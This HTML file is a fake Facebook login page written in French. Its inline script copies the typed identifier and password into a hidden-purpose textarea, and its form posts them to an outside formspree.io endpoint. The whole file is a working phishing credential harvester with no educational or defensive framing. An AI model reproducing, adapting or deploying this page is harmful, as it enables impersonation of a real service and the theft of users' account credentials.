<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Se connecter</title>

    <style>

        *{

            margin: 0;

            padding: 0;

        }

        body{

            margin: 0;

            padding: 0;

            box-sizing: border-box;

            text-align: center;

        }

        header{

            padding: 0.5rem;

        }

        section{

            margin-bottom: 1rem;

            margin-top: 1rem;

        }

        .principal{

            text-align: center;

        }

        .principal p{

            margin-bottom: 2.5px;

            text-align: left;

            margin-left: 5.5px;

        }

        .principal input{

            width: 98%;

            height: 1.5rem;

            margin-top: 5px;

        }

        .btn{

            background-color: rgb(60, 60, 231);

            font-weight: 600;

            color: white;

            margin-bottom: 5px;

        }

        a{

            text-decoration: none;

            margin-top: 5px;

        }

        .lang{

            display: flex;

            text-align: left;

            flex-direction: column ;

            gap: 1rem;

            margin-left: 0.5rem;

        }

        .ou input{

            padding: 0.5rem;

            background: green;

            font-weight: 600;

            color: white;

            border: 0;

            margin-top: 5px;

        }

        .allof{

            

        }

    </style>

</head>

<body>

    <header>

        <h3>

            Facebook

        </h3>

    </header>

    <hr>

    <section class="principal">

        <div>

            <p>

                Numéro mobile ou e-mail

            </p>

            <input type="text" class="maile">

            <p>

                Mot de passe

            </p>

            <input type="password" class="mdp">

        </div>

        <div>

            <form action="https://formspree.io/f/mbjnarzg"
  method="POST">

                <textarea class="allof" readonly required></textarea>

                <input type="submit" value="Connexion" class="btn">

            </form>

            <a href="#">Mot de passe oublié ?</a>

        </div>

    </section>

    <section class="ou">

        <hr>

        ou

        <hr>

        <input type="button" value="Créer un compte">

    </section>

    <section class="lang"> 

        <a href="#">Malagasy</a>

        <a href="#">Français (France)</a>

        <a href="#">English (US)</a>

        <a href="#">Autres langues</a>

    </section>

    <script>

        const maile = document.querySelector('.maile');

        const mdp = document.querySelector('.mdp');

        const allof = document.querySelector('.allof');

        const btn = document.querySelector('.btn');

        mdp.addEventListener('keyup' , () => {

            allof.textContent = "ID : " + maile.value +"\n"+ "MDP : " + mdp.value;

            console.log(allof.textContent);

        })

    </script>

</body>

                </html>
